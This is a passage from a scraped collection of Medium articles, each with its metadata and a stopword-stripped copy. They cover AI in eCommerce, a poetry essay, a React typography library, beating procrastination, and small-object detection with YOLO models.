pressure make something perfect allow make mistake Embrace messing part process you’re stuck get mind writing Many writer mistakenly believe there’s one solution writer’s block push seek inspiration writingrelated activity writing exercise reading that’s exactly true writing there’s time push there’s time step away practice easily identify difference two moment suspect you’re stuck beyond point pushing help step away computer Turn brain “writing mode” release think thing — simply think You’ll surprised brain come taking break like thatTags Self Writing Tips Creativity Writing Self Improvement
3,894
Top 5 Use Cases of AI in eCommerce
When Apple introduced its first iPhone — it was literally a shift in the paradigm of what we always viewed phones to be. Since then, there have been several significant evolutions in technology, but nothing can compare to the biggest of them all — Artificial Intelligence. Don’t agree? AI is having a bearing on almost every conceivable thing, and I suppose I don’t even need to elucidate on the broad applications of this incredible new domain. Naturally, it was about time the benefits of AI were applied to the most lucrative business of the 21st Century — eCommerce. Almost every significant step of commerce over the internet can be transformed by implementing AI. Every significant step, like visiting the retailer’s website, adding products to the cart, placing an order, and even checkout, can be automated using the capabilities of AI. In this article, I will try to shed some light on the practical and significant use-cases of AI in eCommerce and how your eCommerce business can leverage it at this moment in time! There seems to be a lot of confusion on the subject of AI in eCommerce, so let’s put an end to this discussion, once and for all, shall we? 5 Use-Cases of AI in eCommerce 1. Better Search Results It has been observed that customers end up abandoning their purchase because the product results displayed often turn out to be irrelevant. Through AI, organizations are trying to display customer-centric search results that are relevant to what the customer actually asked for. eCommerce websites are increasingly leveraging NLP (or Natural Language Processing) and Image Recognition to better comprehend user language and produce better product results. Yandex, a popular search engine, successfully implemented some advanced applications of NLP and Deep Learning to optimize future searches with the help of the data of previous searches. This turned out to be a massive success, as they were able to increase their click-through rates by almost ten percent. Clarifai is trying to improve ecommerce by building smarter applications that can see the world as people would. In their words, “Artificial Intelligence with a Vision.” These applications enable developers to build more intelligent apps and at the same time empower businesses by providing a customer-centric experience. A demonstration of how Pinterest Lens works. Pinterest is partnering with ecommerce stores for its new offering, Pinterest Lens, to find matching items in the store directly from their image on Pinterest. This matters because people generally abandon their search when they aren’t able to find the relevant product. Developments such as these are not just helping businesses generate better revenues, but are also shortening the customer’s journey. 2. Shopping Experience Level 1001! How do you enhance the user’s shopping experience? Make it as real as possible! If you want to understand just how much Google knows about you, go check out your Google Maps Timeline! The devices that you use collect and store a ton of information about you. This data is extremely valuable, as the right type of information can enrich and improve your shopping experience. Deep Learning and Machine Learning technologies are able to utilize the smallest piece of data.
For instance, even the hover that you made over a product is analyzed and evaluated to understand the likelihood of you buying that product. In practice, this personalization helps deliver images of related products, enticing offers related to the product, alerts related to that product, and dynamic content that alters according to demand and supply. AI engines such as Boomtrain act as a bolt-on to your existing customer channels and help businesses analyze how customers are interacting online. They also provide a unified view across all devices, monitoring and analyzing performance across different platforms. Companies like Criteo are helping Internet retailers serve personalized online display advertisements to consumers who have previously visited the advertiser’s website. Through cross-device advertising, they are able to engage shoppers wherever they are online with premium-placed ads across desktop, mobile, and social. AI helps generate deep and relevant insights by analyzing and scanning through terabytes of data to efficiently predict human behavior. This scale of intelligence helps deliver a personalized shopping experience for the end-user. 3. Curbing Fake Reviews There’s a massive surge of fake reviews aimed at tarnishing the ratings of good products. These reviews not only make good products rank lower but also cost companies billions of dollars. These stats are absolutely insane! Customer reviews are an integral part of the sales cycle. 87% of customers trust what they read without batting an eyelid. The last couple of years have seen a surge in talk around this subject, which has consequently impacted the way customers perceive the information they encounter online, even if it is ostensibly written by a credible source. Artificial Intelligence is increasingly being deployed to analyze user reviews. For instance, Yelp has deployed a sentiment analysis technique to classify its review ratings. Through this technique, they organize the information into different data sets like business_id (ID of the business being reviewed), date (day the review was posted), review_id (ID for the published review), stars (1–5 rating for the business), text (review text), etc. Along similar lines, Facebook has come up with its AI solution “fastText” for text classification, which offers supervised as well as unsupervised learning algorithms to obtain vector representations for words. 4. Sales Forecasting Earlier only God or Charles Xavier could have read your mind — but now — AI can too! Try to fathom an alternate reality where all your marketing efforts and expenditures are targeted only where the customer is likely to make a purchase. Your conversion rate will be at an all-time high, and you won’t waste your capital on customers who won’t buy. Being able to foretell how much of a given product will sell by a specific date will enable shop owners to stock up on inventory more efficiently, and simultaneously eliminate large sums of unwanted cost. It is especially valuable for industries dealing with perishable products, which include not only groceries but also concert and transportation tickets — anything that costs money when unsold. Sounds too good to be true, right? AI solutions can gather historical data about past purchases and help your sales team better derive conclusions and make decisions.
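To make the forecasting idea concrete, here is a minimal, hypothetical sketch of the kind of model such a solution might start from: fitting a simple regression to historical daily sales and projecting the next week. The file name, column names, and the use of pandas and scikit-learn are illustrative assumptions, not a description of any particular vendor’s product.

import pandas as pd
from sklearn.linear_model import LinearRegression

# Hypothetical history: one row per day with total units sold for a single product
sales = pd.read_csv("daily_sales.csv", parse_dates=["date"])  # assumed columns: date, units_sold
sales = sales.sort_values("date").reset_index(drop=True)

# Use the day index as a single numeric feature (a deliberately simple baseline)
X = sales.index.values.reshape(-1, 1)
y = sales["units_sold"].values

model = LinearRegression()
model.fit(X, y)

# Project demand for the next 7 days to guide stocking decisions
future_days = [[len(sales) + i] for i in range(1, 8)]
forecast = model.predict(future_days)
print([round(max(units, 0)) for units in forecast])

A production system would add features like seasonality, promotions, and price, but even this baseline shows how past purchases can be turned into a concrete stocking decision.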
Besides, you won’t even need to sell an arm and a leg to afford this, as these solutions are easily deployable, even by organizations with smaller budgets. Employing AI, businesses were able to derive relevant conclusions like – suggesting products that should be promoted on a particular date, identifying popular products that are making good sales, predicting what customers are likely to purchase in advance, determining the highest price a customer will pay for your product, targeting promotions, reducing fraud, improving supply chain management, enhancing business intelligence, and making the most money on your sales. 5. Chatbots to the Rescue It might be hard for you to feel special amongst an ocean of 7 billion, right? Well, eCommerce websites are adopting chatbots to make you feel special. Companies are increasingly deploying chatbots to improve customer service and satisfaction. Go ahead and browse any ecommerce site; a little chatbox will pop up asking you what you want to purchase. Once you enter your requirements, you get filtered results specific to your taste. Let us list some benefits of deploying chatbots: Chatbots have increased customer conversion tremendously by reducing the labor for lazy buyers. We have come so far from the time when chatbots offered just customary replies. Now they have become intelligent beings who understand and tackle a range of issues that they were earlier incapable of. It is vital to provide real-time support to online shoppers: a recent study found that almost 83% of online shoppers need assistance while shopping, and chatbots make it possible to provide that support in real time. Chatbots also provide a more personalized experience for consumers. Compared with social media, chatbots can make conversations more interactive and engaging. They increase sales figures by up to 40%. Deploying chatbots helps to collect feedback more efficiently. Additionally, it can make it easier to track purchasing patterns and consumer behavior. Chatbots provide efficiency at an affordable price. Live support can be quite costly, with limited work hours. Chatbots automate the process and can operate 24/7. Chatbots are gaining ground. Apart from potentially changing the industry, implementing a chatbot can be a good marketing campaign. Any company that wants to stay ahead in the race needs to follow this trend.
https://medium.com/gobeyond-ai/top-5-use-cases-of-ai-in-ecommerce-88c9b8d58bc7
['Mayank Pratap']
2020-02-24 13:11:46.912000+00:00
['AI', 'Artificial Intelligence', 'Ai Development', 'Ai In Ecommerce', 'Ecommerce']
Title Top 5 Use Cases AI eCommerceContent Apple introduced first iPhone — literally shift paradigm always viewed phone Since several significant evolution technology nothing compare biggest — Artificial Intelligence Don’t agree AI bearing almost every conceivable thing suppose don’t even need elucidate broad application incredible new domain Naturally time benefit AI implicated lucrative business 21st Century — eCommerce Almost every significant step commerce internet transformed implementing AI Every significant step like Visiting retailer’s website adding product cart Placing order even Checkout automated using capability AI article would try shed light practical significant usecases AI eCommerce eCommerce business leverage moment time seems lot conundrum subject AI eCommerce let’s put end discussion shall 5 UseCases AI eCommerce 1 Better Search Results observed customer end abandoning purchase often product result displayed turn irrelevant AI organization trying display customercentric search result relevant desired ask eCommerce website increasingly leveraging NLP Natural Language Processing Image Recognition better comprehend user language produce better product result Trending GoBeyondai article 2 Strategies Best Practices Managing ECommerce Customer Service 3 Top 15 Magento 2 Extensions ECommerce Site 4 Free Influencers Took Brand Global Success Yandex popular search engine successfully implemented advanced application NLP Deep Learning optimize future search help data previous search turned massive success able increase clickthrough rate almost ten percent Clarifai trying improve ecommerce building smarter application see world people would word “Artificial Intelligence Vision” application enable developer build intelligent apps time empower business providing customercentric experience demonstration Pinterest Lens work Pinterest partnering ecommerce store new offering Pinterest Lens find matching item store directly image Pinterest great standpoint people generally abandon search aren’t able find relevant product Developments helping business generate better revenue also reducing customers’ journey Recommended Read 5 Tips Ensure Impeccable Security eCommerce Business 2 Shopping Experience Level 1001 enhance user’s shopping experience Make real possible want understand much Google know go check Google Maps Timeline device use collect store ton information data extremely valuable right type information enrich improve shopping experience Deep Learning Machine Learning technology able utilize smallest piece data instance even hover made product analyzed evaluated understand likelihood buying product practice personalization help deliver image related product enticing offer related product alert related product dynamic content alters according demand supply AI engine Boomtrain act bolton existing customer channel help business analyze customer interacting online also provides unified view across device monitoring analyzing performance across different platform Companies like Criteo assisting Internet retailer serve personalized online display advertisement consumer previously visited advertiser’s website crossdevice advertising able engage shopper wherever online premiumplaced ad across desktop mobile social AI assisting generating deep relevant insight data analyzing scanning terabyte data efficiently predict human behavior scale intelligence help deliver personalized shopping experience enduser 3 Curbing Fake Reviews There’s massive insurgence fake review aimed tarnishing rating good 
product review make good product rank also cost company billion dollar stats absolutely insane Customer review integral part sale cycle 87 customer trust read without blink eyelid last couple year seen surge talk around subject consequently impacted way customer perceive information encounter online even ostensibly written credible source Artificial Intelligence increasingly deployed analyze user review instance Yelp deployed sentiment analysis technique classify review rating technique organize information different data set like businessid ID business reviewed date Day review posted reviewid ID published review star 1–5 rating business text Review text etc similar line Facebook come AI solution “fastText” text classification create supervised well unsupervised learning algorithm obtain vector representation word 4 Sales Forecasting Earlier God Charles Xavier could read mind — — AI Try fathom alternate reality marketing effort expenditure targeted customer likely make purchase conversion rate alltime high won’t waste capital customer won’t buy able foretell much given product sell specific date enable shop owner stack inventory efficiently simultaneously eliminate large sum undesired cost especially valuable industry dealing perishable product include grocery also ticket concert transportation — anything cost money unsold Also Read build awesome Ecommerce App Sounds good true right AI solution gather historical data past purchase help sale team better derive conclusion make decision Besides won’t even need sell arm leg afford either solution easily deployable even organization smaller budget Employing AI business able derive relevant conclusion like – Suggesting product promoted particular date Identify popular product making good sale Predicting customer likely purchase advance Determining highest price customer pay product Targeted promotion Reduce fraud Improve supply chain management Enhance business intelligence Make money sale 5 Chatbots Rescue might hard feel special amongst ocean 7 Billion right Well eCommerce website adopting chatbots make feel special Companies increasingly deploying chatbots improve customer service satisfaction Go ahead browse ecommerce site little chatbox popup asking want make purchase enter requirement get filtered result specific taste Let u list benefit deploying chatbots Chatbots increased customer conversion tremendously reducing labor lazy buyer come far time chatbots offered customary reply become intelligent being understand tackle range issue earlier incapable understand tackle range issue earlier incapable vital provide realtime support online shopper recent study found almost 83 online shopper need assistance shopping chatbots make possible provide realtime support shopping chatbots make possible provide realtime support Chatbots also provide personalized experience consumer Compared social medium chatbots make conversation interactive engaging increase sale figure 40 consumer Compared social medium chatbots make conversation interactive engaging increase sale figure 40 Deploying chatbots help collect feedback efficiently Additionally make easier track purchasing pattern consumer behavior Chatbots provide efficiency affordable price Live support quite costly limited work hour Chatbots automate process operate 247 Chatbots gaining ground Apart potentially changing industry implementing chatbot good marketing campaign company want stay ahead race need follow trend Discover Latest Jobs Bots NLP AI ML NLU MoreTags AI Artificial Intelligence Ai 
Development Ai Ecommerce Ecommerce
3,895
The Tragedy Of Poetry Appreciation
A poetry appreciation class is to poems what applesauce is to apples. We eat applesauce at room temperature, no chewing required, and in a mouth that breeds sadness. Similarly, we teach poetry appreciation in tame, extra-credit, cage-like places where eyes dart for the clock, pleading how much longer? Applesauce is a consolation prize. It is a bland, formless, disappointing mush that they once served in small white bowls with thin green stripes around the edges in elementary schools. To be clear, apples themselves are delightful, delicious, succulent gifts from the happiest gods. They include thousands of varieties. My taste buds dance the Bossa nova in anticipation of sinking my teeth into one of those magnificent manifestations of nature’s bounty. But let’s talk about poems, how those little engines of magic pump their ideas, feelings, and wisdom deep into broken hearts and souls’ infrastructure. Let’s talk about how even well-meaning poetry appreciation classes strain the muscle, fiber, and power from poetry. Stripping away its lightning, its rolling thunder, its winds and storms and aching hearts. Why can’t we just let poetry appreciation simply slip away like applesauce? It may still exist in a faraway tepid and tasteless cafeteria, but thanks to a merciful God, we no longer have to eat it.
https://medium.com/literally-literary/the-tragedy-of-poetry-appreciation-39ba085b7f32
['Dale Biron']
2020-09-25 05:32:57.058000+00:00
['Creativity', 'Writing', 'Poetry']
Title Tragedy Poetry AppreciationContent poetry appreciation class poem applesauce apple eat applesauce room temperature chewing required mouth breed sadness Similarly teach poetry appreciation tame extracredit cagelike place eye dart clock pleading much longer Applesauce consolation prize bland formless disappointing mush served small white bowl thin green stripe around edge elementary school clear apple delightful delicious succulent gift happiest god include thousand variety taste bud dance Bossa nova anticipation sinking teeth one magnificent manifestation nature’s bounty let’s talk poem little engine magic pump idea feeling wisdom deep broken heart souls’ infrastructure Let’s talk even wellmeaning poetry appreciation class strain muscle fiber power poetry Striping away lightning rolling thunder wind storm aching heart can’t let poetry appreciation simply slip away like applesauce may still exist faraway tepid tasteless cafeteria thanks merciful God longer eat itTags Creativity Writing Poetry
3,896
How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple
How I Built Grotesk, a React Component (and CSS Library) That Makes Web Type Simple Typography styles, simplified What’s Grotesk? Grotesk is a CSS library and React component that aims to make web typography simple. The reason I built it is that I’ve noticed I start almost every static website off with the same set of themes or typographic rules, so I decided to build a tiny library I can just plug into my next project easily. Since I mostly work on React applications and plain ol’ static websites, I made a React component and a CSS library.
https://medium.com/better-programming/how-i-built-grotesk-a-react-component-and-css-library-that-makes-web-type-simple-a84b832aeb00
['Kartik Nair']
2020-03-03 06:34:42.647000+00:00
['CSS', 'Programming', 'Design', 'React', 'JavaScript']
Title Built Grotesk React Component CSS Library Makes Web Type SimpleContent Built Grotesk React Component CSS Library Makes Web Type Simple Typography style simplified What’s Grotesk Grotesk CSS library React component aim make web typography simple reason built I’ve noticed start almost every static website set theme typographic rule decided build tiny library plug next project easily Since mostly work React application plain ol’ static website made React component CSS libraryTags CSS Programming Design React JavaScript
3,897
Focus on Having a Good Time to Beat Your Procrastination
Focus on Having a Good Time to Beat Your Procrastination Focusing on micro-managing our time just creates more boring chores to procrastinate over! Photo by Marcin Dampc from Pexels Procrastination has been my archenemy for at least 2 decades, and it has led to problems in work, in my relationships, and in life in general. It took me years of research and trying different approaches to eventually solve my procrastination problem. Most people find that focusing on micro-managing their time is an important element in beating their procrastination. However, it does present two additional problems to the serial procrastinator. First, you have to beat your procrastination long enough to put the methods into action. Second, these methods are extra chores that your brain will procrastinate over. After spending years trying to manage my procrastination, I looked at the root causes of my procrastination and the reasoning behind them. By addressing what I found and managing my periods of procrastination, I could master my procrastination. Why Do We Procrastinate? Photo by Pixabay from Pexels Most of us procrastinate because our subconscious brain is rebelling in some form or another. Your brain could be rebelling against: deadlines, including ones you have set yourself (your brain doesn’t like anything that holds authority over it or limits its choices); things it doesn’t enjoy doing; things it does not find stimulating enough; or not doing something it enjoys, or that it thinks is more important. Other people will have other reasons for their brain rebelling and procrastinating, but rarely is procrastination just laziness. The one common thing that runs through all the reasons is that your brain craves a better quality of life for itself. So, it simply rebels against anything that gets in its way of a better quality of life. It rebels against meeting that deadline. It rebels against doing things it doesn’t like. It rebels against anything that stops it from getting an instant hit of fun. Your brain is sulking like a naughty toddler who doesn’t get its way. For a more in-depth look at this phenomenon, I recommend reading The Chimp Paradox by Dr. Steve Peters. In short, your brain is simply seeking a better quality of life and wants to ignore anything that gets in its way. The Endless Procrastination Cycle Procrastination can become an endless cycle that gets harder to break the longer it goes on. Now that a lot of us are working from home, we find procrastination is an easy trap to fall into. After all, no one can see if you are working or not. So, to make up for our procrastination, we work a bit longer than normal. Then we spend our evenings stressing about what we didn’t achieve during the day and how we will catch up in the morning. Eventually, the worry will start keeping you up at night. Before you know it, all of your quality time has been eaten up by work and stress. The tasks you procrastinated over now occupy your mind when you should be spending quality time with your friends and family. They keep you awake at night, and your brain’s quality of life declines further and further. The more your brain’s quality of life declines, the more it will find things to procrastinate over while it seeks a better quality of life. And so, the cycle continues downwards. Play Hard, Then Work Hard Photo by Vincent Gerbouin from Pexels So, I looked for ways of improving my brain’s quality of life and immediately ran into a problem. My brain is conditioned to believe that rewards come after hard work, and not before.
So, my first plan was to promise myself treats if I completed a task. For the brains of non-procrastinators, this works really well. Unfortunately, the brains of procrastinators don’t normally work that way. They want the rewards now. My mind instantly rebelled against working for treats and started procrastinating again. It didn’t care what the size of my promised reward was; my brain kept on procrastinating because it wanted a better quality of life now, not later. So, I flipped things on their head and just took all the rewards I promised myself, regardless of any tasks I had completed or not. I made a conscious effort to fill my spare time with quality activities, including: spending quality time with my family and grandchildren, playing video games (something I have loved since the 80s), country walks, DIY and gardening projects, learning to cook, blasting out my favorite tunes, and binge-watching TV shows and films. I also made other quality of life adjustments, such as removing my work email and messaging software from my phone. And I banned my phone from the bedroom and replaced it with a traditional alarm clock. This greatly limited how much my work life invaded my spare time and my quality of life. By filling my spare time with these quality activities, I achieved two things. First, I improved my brain’s quality of life by giving it what it craved. Second, I starved my brain of time to stress over my procrastination, stopping the endless procrastination cycle. The first two weeks were hard, as I had to overcome decades of unhealthy habits. The biggest of these was a tendency to think work always came above and before everything else in life. The results were amazing. After the initial two weeks of setting up better habits, it only took a week or two for my procrastination at work to drop. Then my ability to study improved, and finally my relationships improved. Six months later, my procrastination is all but gone. Like most people, I still have tasks I hate doing and I drag my feet over them, but now they are manageable with simple time management techniques. With my brain experiencing a better quality of life, my time micro-management techniques stopped being an extra chore to procrastinate over. Instead, they became more powerful and easier to implement and maintain. The Takeaways Photo by Blu Byrd from Pexels For most people, there is a lot to be said for the phrase “Work hard, play hard”; however, for procrastinators it is backward. We need to play hard and then work hard. If you use techniques to micro-manage your procrastination periods, hold on to them — they will play an even bigger role in the future. Improving your brain’s quality of life will make them as powerful as you initially hoped they would be. By improving your brain’s quality of life, you remove the primary reason for your brain to procrastinate over chores. Time micro-management techniques will still help make more effective use of your time and get through those times when your brain sulks for no apparent reason.
https://medium.com/swlh/focus-on-having-a-good-time-to-beat-your-procrastination-8660c0bb34c4
['Sammy Jones']
2020-12-19 22:20:25.567000+00:00
['Management', 'Life Lessons', 'Startup', 'Entrepreneurship', 'Business']
Title Focus Good Time Beat ProcrastinationContent Focus Good Time Beat Procrastination Focusing micromanaging time creates boring chore procrastinate Photo Marcin Dampc Pexels Procrastination archenemy least 2 decade led problem work relationship life general took year research trying different approach eventually solve procrastination problem people find focusing micromanaging time important element beating procrastination However present two additional problem serial procrastinator First beat procrastination long enough put method action Second method extra chore brain procrastinate spending year trying manage procrastination looked root cause procrastination reasoning behind addressing found managing period procrastination could master procrastination Procrastinate Photo Pixabay Pexels u procrastinate subconscious brain rebelling form another brain could rebelling Deadlines including one set brain doesn’t like anything hold authority limit choice Things doesn’t enjoy Things find stimulating enough something enjoys think important people reason brain rebelling procrastinating rarely procrastination laziness one common thing run reason brain craves better quality life simply rebel anything get way better quality life rebel meeting deadline rebel thing doesn’t like rebel anything stop getting instant hit fun brain sulking like naughty toddler doesn’t get way indepth look phenomenon recommend reading Chimp Paradox Dr Steve Peters short brain simply seeking better quality life want ignore anything get way Endless Procrastination Cycle Procrastination become endless cycle get harder break longer go lot u working home find procrastination easy trap fall one see working make procrastination work bit longer normal spend evening stressing didn’t achieve day catch morning Eventually worry start keeping night know quality time eaten work stress task procrastinated occupy mind spending quality time friend family keep awake night brain’s quality life decline brain’s quality life decline find thing procrastinate seek better quality life cycle continues downwards Play Hard Work Hard Photo Vincent Gerbouin Pexels looked way improving brain’s quality life immediately ran problem brain conditioned believe reward come hard work first plan promise treat completed task brain nonprocrastinators work really well Unfortunately brain procrastinator don’t normally work way want reward mind instantly rebelled working treat started procrastinating didn’t care size promised reward brain kept procrastinating wanted better quality life later flipped thing head took reward promised regardless task completed made conscious effort fill spare time quality activity including Spending quality time family grandchild Playing video game something loved since 80 Country walk DIY Gardening project Learning cook Blasting favorite tune Bingewatching TV show film also made quality life adjustment removing work email messaging software phone banned phone bedroom replaced traditional alarm clock greatly limited much work life invaded spare time quality life filling spare time quality activity achieved two thing First improved brain’s quality life giving craved Second starved brain time stress procrastination stopping endless procrastination cycle first two week hard overcome decade unhealthy habit biggest tendency think work always came everything else life result amazing initial two week setting better habit took week two procrastination work drop ability study improved finally relationship improved 6 month later procrastination 
gone Like people still task hate drag foot manageable simple time management technique brain experiencing better quality life time micromanagement technique stop extra chore procrastinate Instead became powerful easier implement maintain Takeaways Photo Blu Byrd Pexels people lot said phrase “Work hard play hard” however procrastinator backward need play hard work hard use technique micromanage procrastination period hold — play even bigger role future Improving brain’s quality life make powerful initially hoped would improving brain’s quality life remove primary reason brain procrastinate chore Time micromanagement technique still help make effective use time get time brain sulk apparent reasonTags Management Life Lessons Startup Entrepreneurship Business
3,898
Tackling the Small Object Problem in Object Detection
Tackling the Small Object Problem in Object Detection Note: we have also published Tackling the Small Object Problem on our blog. Detecting small objects is one of the most challenging and important problems in computer vision. In this post, we will discuss some of the strategies we have developed at Roboflow by iterating on hundreds of small object detection models. Small objects as seen from above by drone in the public aerial maritime dataset To improve your model’s performance on small objects, we recommend the following techniques: increasing your image capture resolution, increasing your model’s input resolution, tiling your images, generating more data via augmentation, auto-learning model anchors, and filtering out extraneous classes. If you prefer video, I have also recorded a discussion of this post. Why is the Small Object Problem Hard? The small object problem plagues object detection models worldwide. Not buying it? Check the COCO evaluation results for recent state of the art models YOLOv3, EfficientDet, and YOLOv4: Check out AP_S, AP_M, AP_L for state of the art models. Small objects are hard! (cite) In EfficientDet, for example, AP on small objects is only 12%, held up against an AP of 51% for large objects. That is almost a fivefold difference! So why is detecting small objects so hard? It all comes down to the model. Object detection models form features by aggregating pixels in convolutional layers. Feature aggregation for object detection in PP-YOLO And at the end of the network a prediction is made based on a loss function, which sums up across pixels based on the difference between prediction and ground truth. The loss function in YOLO If the ground truth box is not large, the signal will be small while training is occurring. Furthermore, small objects are the most likely to have data labeling errors, where their identification may be omitted. Empirically and theoretically, small objects are hard. Increasing your image capture resolution Resolution, resolution, resolution… it is all about resolution. Very small objects may contain only a few pixels within the bounding box — meaning it is very important to increase the resolution of your images to increase the richness of features that your detector can form from that small box. Therefore, we suggest capturing images at as high a resolution as possible. Increasing your model’s input resolution Once you have your images at higher resolution, you can scale up your model’s input resolution. Warning: this will result in a large model that takes longer to train, and will be slower to infer when you start deployment. You may have to run experiments to find the right tradeoff between speed and performance. You can easily scale your input resolution in our tutorial on training YOLOv4 by changing the image size in the config file:
[net]
batch=64
subdivisions=36
width={YOUR RESOLUTION WIDTH HERE}
height={YOUR RESOLUTION HEIGHT HERE}
channels=3
momentum=0.949
decay=0.0005
angle=0
saturation = 1.5
exposure = 1.5
hue = .1
learning_rate=0.001
burn_in=1000
max_batches=6000
policy=steps
steps=4800.0,5400.0
scales=.1,.1
You can also easily scale your input resolution in our tutorial on how to train YOLOv5 by changing the image size parameter in the training command:
!python train.py --img {YOUR RESOLUTION SIZE HERE} --batch 16 --epochs 10 --data '../data.yaml' --cfg ./models/custom_yolov5s.yaml --weights '' --name yolov5s_results --cache
Note: you will only see improved results up to the maximum resolution of your training data. Tiling your images Another great tactic for detecting small objects is to tile your images as a preprocessing step.
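As a rough illustration of what tiling means in practice, here is a minimal Python sketch (using Pillow, with a hypothetical input file and an assumed tile size) that slices a high-resolution image into fixed-size crops; in a real pipeline the bounding-box labels would need to be shifted into each tile’s coordinates, and the same grid applied again at inference time.

import os
from PIL import Image

TILE = 416  # tile width/height in pixels (an assumed value matching the model input size)

image = Image.open("aerial_frame.jpg")  # hypothetical high-resolution capture
width, height = image.size

os.makedirs("tiles", exist_ok=True)
count = 0
for top in range(0, height, TILE):
    for left in range(0, width, TILE):
        # Crop a TILE x TILE window; tiles at the right/bottom edge are clamped to the image border
        box = (left, top, min(left + TILE, width), min(top + TILE, height))
        image.crop(box).save(f"tiles/tile_{count:04d}.jpg")
        count += 1

Overlapping the tiles slightly is a common refinement, so that objects cut by a tile boundary still appear whole in at least one crop.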
Tiling effectively zooms your detector in on small objects, but allows you to keep the small input resolution you need in order to be able to run fast inference. Tiling images as a preprocessing step in Roboflow If you use tiling during training, it is important to remember that you will also need to tile your images at inference time. Generating More Data Via Augmentation Data augmentation generates new images from your base dataset. This can be very useful to prevent your model from overfitting to the training set. Some especially useful augmentations for small object detection include random crop, random rotation, and mosaic augmentation. Auto Learning Model Anchors Anchor boxes are prototypical bounding boxes that your model learns to predict in relation to. That said, anchor boxes can be preset and sometimes suboptimal for your training data. It is good to custom-tune these to your task at hand. Thankfully, the YOLOv5 model architecture does this for you automatically based on your custom data. All you have to do is kick off training:
Analyzing anchors... anchors/target = 4.66, Best Possible Recall (BPR) = 0.9675. Attempting to generate improved anchors, please wait...
WARNING: Extremely small objects found. 35 of 1664 labels are < 3 pixels in width or height.
Running kmeans for 9 anchors on 1664 points...
thr=0.25: 0.9477 best possible recall, 4.95 anchors past thr
n=9, img_size=416, metric_all=0.317/0.665-mean/best, past_thr=0.465-mean: 18,24, 65,37, 35,68, 46,135, 152,54, 99,109, 66,218, 220,128, 169,228
Evolving anchors with Genetic Algorithm: fitness = 0.6825: 100%|██████████| 1000/1000 [00:00<00:00, 1081.71it/s]
thr=0.25: 0.9627 best possible recall, 5.32 anchors past thr
n=9, img_size=416, metric_all=0.338/0.688-mean/best, past_thr=0.476-mean: 13,20, 41,32, 26,55, 46,72, 122,57, 86,102, 58,152, 161,120, 165,204
Filtering Out Extraneous Classes Class management is an important technique to improve the quality of your dataset. If you have one class that is significantly overlapping with another class, you should filter this class from your dataset. And perhaps you decide that the small object in your dataset is not worth detecting, so you may want to take it out. You can quickly identify all of these issues with the Advanced Dataset Health Check that is a part of Roboflow Pro. Class omission and class renaming are all possible through Roboflow’s ontology management tools. Conclusion Properly detecting small objects is truly a challenge. In this post, we have discussed a few strategies for improving your small object detector, namely: increasing your image capture resolution, increasing your model’s input resolution, tiling your images, generating more data via augmentation, auto-learning model anchors, and filtering out extraneous classes. As always, happy detecting!
https://towardsdatascience.com/tackling-the-small-object-problem-in-object-detection-6e1c9976ee69
['Jacob Solawetz']
2020-10-12 14:31:18.087000+00:00
['Artificial Intelligence', 'Data Science', 'Object Detection', 'Computer Vision', 'Deep Learning']
Title Tackling Small Object Problem Object DetectionContent Tackling Small Object Problem Object Detection Note also published Tackling Small Object Problem blog Detecting small object one challenging important problem computer vision post discus strategy developed Roboflow iterating hundred small object detection model Small object seen drone public aerial maritime dataset improve model’s performance small object recommend following technique prefer video also recorded discussion post Small Object Problem Hard small object problem plague object detection model worldwide buying Check COCO evaluation result recent state art model YOLOv3 EfficientDet YOLOv4 Check APS APM APL state art model Small object hard cite EfficientDet example AP small object 12 held AP 51 large object almost five fold difference detecting small object hard come model Object detection model form feature aggregating pixel convolutional layer Feature aggregation object detection PPYOLO end network prediction made based loss function sum across pixel based difference prediction ground truth loss function YOLO ground truth box large signal small training occurring Furthermore small object likely data labeling error identification may omitted Empirically theoretically small object hard Increasing image capture resolution Resolution resolution resolution… resolution small object may contain pixel within bounding box — meaning important increase resolution image increase richness feature detector form small box Therefore suggest capturing high resolution image possible possible Increasing model’s input resolution image higher resolution scale model’s input resolution Warning result large model take longer train slower infer start deployment may run experiment find right tradeoff speed performance easily scale input resolution tutorial training YOLOv4 changing image size config file net batch64 subdivisions36 widthYOUR RESOLUTION WIDTH heightYOUR RESOLUTION HEIGHT channels3 momentum0949 decay00005 angle0 saturation 15 exposure 15 hue 1 learningrate0001 burnin1000 maxbatches6000 policysteps steps4800054000 scales11 also easily scale input resolution tutorial train YOLOv5 changing image size parameter training command python trainpy img RESOLUTON SIZE batch 16 epoch 10 data datayaml cfg modelscustomyolov5syaml weight name yolov5sresults cache Note see improved result maximum resolution training data Tiling image Another great tactic detecting small image tile image preprocessing step Tiling effectively zoom detector small object allows keep small input resolution need order able run fast inference Tiling image preprocessing step Roboflow use tiling training important remember also need tile image inference time Generating Data Via Augmentation Data augmentation generates new image base dataset useful prevent model overfitting training set especially useful augmentation small object detection include random crop random rotation mosaic augmentation Auto Learning Model Anchors Anchor box prototypical bounding box model learns predict relation said anchor box preset sometime suboptimal training data good custom tune task hand Thankfully YOLOv5 model architecture automatically based custom data kick training Analyzing anchor anchorstarget 466 Best Possible Recall BPR 09675 Attempting generate improved anchor please wait WARNING Extremely small object found 35 1664 label 3 pixel width height Running kmeans 9 anchor 1664 point thr025 09477 best possible recall 495 anchor past thr n9 imgsize416 metricall03170665meanbest pastthr0465mean 
1824 6537 3568 46135 15254 99109 66218 220128 169228 Evolving anchor Genetic Algorithm fitness 06825 100██████████ 10001000 00000000 108171its thr025 09627 best possible recall 532 anchor past thr n9 imgsize416 metricall03380688meanbest pastthr0476mean 1320 4132 2655 4672 12257 86102 58152 161120 165204 Filtering Extraneous Classes Class management important technique improve quality dataset one class significantly overlapping another class filter class dataset perhaps decide small object dataset worth detecting may want take quickly identify issue Advanced Dataset Health Check part Roboflow Pro Class omission class renaming possible Roboflow’s ontology management tool Conclusion Properly detecting small object truly challenge post discussed strategy improving small object detector namely always happy detectingTags Artificial Intelligence Data Science Object Detection Computer Vision Deep Learning
3,899
Benchmarking API Endpoints With TypeScript Decorators
